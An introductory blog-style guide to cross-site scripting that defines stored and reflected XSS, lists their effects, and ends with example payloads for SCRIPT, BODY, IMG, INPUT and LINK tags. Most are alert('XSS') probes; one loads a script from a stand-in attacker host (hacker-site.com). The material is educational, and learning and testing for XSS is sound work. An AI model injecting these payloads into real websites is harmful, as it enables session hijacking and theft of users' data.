A Basic Guide to Cross Site Scripting (XSS)

Every day we listen that website is vulnerable to XSS or Cross Site Scripting because hackers are constantly targeting websites using this vulnerability. Even the Top Tech Web sites are vulnerable to XSS. So question comes to mind What is XSS? What can be its disadvantages? We will try to answer these question in todays post. Some top Web sites offer Bug Bounty Program to prevent from these kinds of Bugs. As this is a basic guide, We will just give introduction of XSS, Its Types, How it can be used in Attack and some of its examples with code.

Cross Site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. It is the 3rd Vulnerability listed in Top 10 Owasp Vulnerability 2013.
Cross-site scripting is a hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.When an attacker introduces a malicious script to a dynamic form submitted by the user, a cross-site scripting (XSS) attack then occurs. An XSS attack leads to undesirable effects. For example, the attacker gains the ability to capture the session information, peer into private user details such as ID, passwords, credit card information, home address and telephone number, social security/tax IDs, and so on. If the targeted Web site doesn’t check for this type of malicious code, misuse of the user is probable.
Types of XSS:
XSS attacks generally categorized into two categories:
  • Stored XSS ( Persistent)
  • Reflected XSS ( Non Persistent )
  • There is a third type of XSS attack called DOM Based XSS which is not very well known.
Stored XSS:
Stored XSS also called Persistent XSS. Stored XSS attack is the most dangerous types of XSS Attack. Stored attacks are those where the injected(malicious) code is not properly filtered & permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Since this vulnerability typically involves at least two requests to the application, this may also call Second-order XSS.
Stored XSS can be used to conduct a number of browser-based attacks including:
  • Hijacking another user’s browser
  • Capturing sensitive information viewed by application users
  • Pseudo defacement of the application
  • Directed delivery of browser-based exploits
  • Other malicious activities
Reflected XSS:
Reflected XSS ( also known as Non-Persistent XSS) vulnerability is by far the most common type. Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a “trusted” server.
Some examples of XSS with currently focus on the tags that can be vulnerable to XSS.
The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT><SCRIPT> alert(“XSS”); </SCRIPT>
<BODY> Tag:
The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:
<BODY ONLOAD=alert(“XSS”)>

<IMG> Tag:
Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC=”javascript:alert(‘XSS’);”>

There are some variations of this that work in some browsers:

<IMG DYNSRC=”javascript:alert(‘XSS’)”><IMG LOWSRC=”javascript:alert(‘XSS’)”>


<INPUT> Tag:
If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>


<LINK> Tag:
The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>